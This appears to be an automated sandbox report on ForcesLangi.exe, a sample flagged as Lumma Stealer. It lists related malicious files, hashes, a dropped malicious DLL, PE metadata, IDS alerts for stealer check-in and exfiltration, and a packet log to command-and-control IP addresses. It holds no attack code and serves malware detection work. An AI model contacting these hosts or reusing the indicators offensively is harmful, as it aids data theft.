                                                                                                                                                                                                                                            launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.58.80
                                                                                                                                                                                                                                            Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.75.163
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.2.114
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.2.114
                                                                                                                                                                                                                                            http://proxyium.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.80.92
                                                                                                                                                                                                                                            https://cbhc9.anguatiab.ru/RpweC/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 1.1.1.1
                                                                                                                                                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 172.67.148.171

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            • 92.122.104.90

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ForcesLangi.exe.log

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ForcesLangi.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\gdi32.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ForcesLangi.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):649728
                                                                                                                                                                                                                                            Entropy (8bit):7.115011073807816
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:YSqig5JxL8kZIOWhbN4ddlannT5EbJ+vMvb4Yw8kU0khq7:YfighL8ekmd+Tie
                                                                                                                                                                                                                                            MD5:C69855DE2EA93BB19E8B3D9071A586FC
                                                                                                                                                                                                                                            SHA1:83612032AF6F152C528D1117B7CF26EDED1EB853
                                                                                                                                                                                                                                            SHA-256:C0A41EAEC5F6C397EADDECF77D9E29AAEC4116776122549F634D64061E631001
                                                                                                                                                                                                                                            SHA-512:5AC19AA55945A4A6BFC3BECABAEF515182D35C0AC99C40E7062427AF7EB0AE1CF7D650C622133FE66FBC32EF7A8A7652A10A99CAE121F02B5850D5D4860FE3C8
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.....................A..................{w....................................................Rich...........................PE..L.....ng...........!.........j............................................... ............@.............................|...<...P................................*..\...............................x...@...............T............................text.............................. ..`.rdata...e.......f..................@..@.data...............................@....reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.10860840065778
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                            File name:ForcesLangi.exe
                                                                                                                                                                                                                                            File size:661'504 bytes
                                                                                                                                                                                                                                            MD5:64f1abe3f2f65e545c54b23809c06583
                                                                                                                                                                                                                                            SHA1:8c32e992999dd0bf57cc45fed77c858cb4768a09
                                                                                                                                                                                                                                            SHA256:05617db5aed9685ac891f4a7539294603640443b4ca5534abac163a544c574fa
                                                                                                                                                                                                                                            SHA512:f2295e25a1496aa4f3fbb29e88cfca8d549dc1b51bd779f61dbe752c663120698e35e0a2681234bd66f069470787da7d7796c3d78fe4cec7ed67a846e676972b
                                                                                                                                                                                                                                            SSDEEP:12288:au0ja8+4WHQB7y9trkcVyiBFAMyhZVUEz4Pjt/ax7s2:au028tPQkcVy+yhZVUEz4PAx7
                                                                                                                                                                                                                                            TLSH:CFE44A1F577BF609E04A0030A59A367B9DF4EF56E107C8F20AC4E6676066861DFECE12
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ng..............0.............r@... ...@....@.. ....................................@................................

                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Entrypoint:0x404072
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x676E97A0 [Fri Dec 27 12:03:44 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                                                                                                            jnl 00007FB0A4E07202h
                                                                                                                                                                                                                                            cmp cl, dl

                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x40200x4f.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x664.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x20000xa0a780xa0c00ea25bcb094238ae30bcddf71b94c0371False0.46740286012830484data7.114943161114869IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rsrc0xa40000x6640x800eb46fcabb49670b1a45623af347b691cFalse0.353515625data3.6082379532908373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .reloc0xa60000xc0x200b8621a767d2dd3d37ce617bafd19944bFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_VERSION0xa40900x3d4data0.42448979591836733
                                                                                                                                                                                                                                            RT_MANIFEST0xa44740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-12-27T22:37:59.411853+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973092.122.104.90443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:00.287622+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973092.122.104.90443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:01.942440+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:02.668693+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:02.668693+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:03.936184+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:04.707649+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:04.707649+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:06.368262+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:08.761026+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:13.131035+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:15.715385+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:17.788574+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:19.549492+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739104.21.66.86443TCP
                                                                                                                                                                                                                                            2024-12-27T22:38:20.418310+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.66.86443TCP

                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.929203033 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.929245949 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.929311991 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.932009935 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.932027102 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.411772013 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.411853075 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.413949966 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.413965940 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.414174080 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.453834057 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.457803011 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:59.503334045 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287662029 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287688017 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287695885 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287708998 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287715912 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287739038 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287756920 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287792921 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.287826061 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.475646973 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.475701094 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.475739002 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.475750923 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.475795031 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.506249905 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.506282091 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.506315947 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.506316900 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.506366014 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569051027 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569077969 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569108963 CET49730443192.168.2.492.122.104.90
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.569114923 CET4434973092.122.104.90192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718358040 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718403101 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718480110 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718734026 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.718744993 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.942296982 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.942440033 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.944856882 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.944864988 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.945067883 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.946146011 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.946240902 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:01.946269035 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668481112 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668576956 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668628931 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668796062 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668814898 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668823957 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.668828011 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677100897 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677155018 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677242041 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677532911 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:02.677548885 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.936075926 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.936183929 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.937254906 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.937262058 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.937484980 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.938571930 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.938571930 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:03.938635111 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707665920 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707729101 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707765102 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707766056 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707783937 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707822084 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707824945 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707835913 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707878113 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.707895994 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.715956926 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.716041088 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.716049910 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.724258900 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.724312067 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.724334002 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.766494989 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.827213049 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.875703096 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.875725985 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912435055 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912470102 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912511110 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912520885 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912564993 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912568092 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912616968 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912947893 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912964106 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912976027 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:04.912981987 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.061811924 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.061860085 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.061933994 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.062256098 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:05.062271118 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.368194103 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.368262053 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.369616032 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.369627953 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.369851112 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371002913 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371134043 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371166945 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371220112 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:06.371227026 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.362896919 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.362994909 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.363049030 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.363189936 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.363210917 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488120079 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488161087 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488226891 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488491058 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:07.488500118 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.760945082 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.761025906 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.762104034 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.762124062 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.762321949 CET44349734104.21.66.86192.168.2.4
